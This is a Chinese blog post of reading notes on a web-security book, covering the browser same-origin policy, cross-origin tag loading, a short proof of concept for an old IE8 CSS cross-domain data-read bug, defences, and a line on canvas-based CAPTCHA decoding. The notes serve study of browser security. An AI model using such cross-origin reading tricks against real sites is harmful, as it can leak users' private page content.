读书笔记----白帽子讲web安全--2015-11-27
来源:互联网 发布:mac safari添加插件 编辑:程序博客网 时间:2024/05/01 15:45
一,浏览器的同源策略
1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性
2. 但是在浏览器中,某些标签是可以跨域加载资源:<script>.,<img><iframe><link>,利用这些标签加载其他未知文件会导致网站陷入不安全中
3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。
4. ie8 css的跨域漏洞:http://www.2cto.com/Article/201009/73046.html
example:
POC:
www.a.com/test.html:
<body>
{}body{fontFamily:
aaaaaaaaaaaaaa
bbbbbbbbbbbbbbbb
</body>
www.b.com/test2.html:
<style>
@import url("http://www.a.com/test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
5.防护措施:浏览器的沙箱模式;恶意网址拦截;EV证书
二:html5的canvas标签可以解析图片验证码
0 0
- 读书笔记----白帽子讲web安全--2015-11-27
- 白帽子讲Web安全读书笔记
- 《白帽子讲Web安全》读书笔记
- 白帽子讲web安全 读书笔记
- 读书笔记/白帽子讲web安全【xss】
- 读书笔记-xss构造技巧-2015-11-30-白帽子讲web安全
- 白帽子讲Web安全
- 白帽子讲Web安全
- 白帽子讲Web安全
- 白帽子讲web安全
- 白帽子讲Web安全 札记
- 白帽子讲web安全之1
- 白帽子讲web安全之2
- 白帽子讲web安全之3
- 白帽子讲web安全之4
- 白帽子讲web安全之5
- 白帽子讲web安全之6
- 读后感 《白帽子讲Web安全》
- ubuntu 14.04 登录 界面 root
- Maven仓库代理信息
- java Io梳理
- opencv imread imwrite "Unhandled exception in ***.exe(msvcr100d.dll):OxC0000005"
- cc2640 基于官方从机修改的通过手机实现蓝牙点灯例程
- 读书笔记----白帽子讲web安全--2015-11-27
- struts2文件上传下载原理
- java 11-27
- 验证身份证正则表达式讲解
- jquery图片轮播
- php中curl_multi的应用
- [数据挖掘]非线性支持向量机:核方法
- 黑马程序员—JAVA基础——集合
- 2.1 求正数N的平方根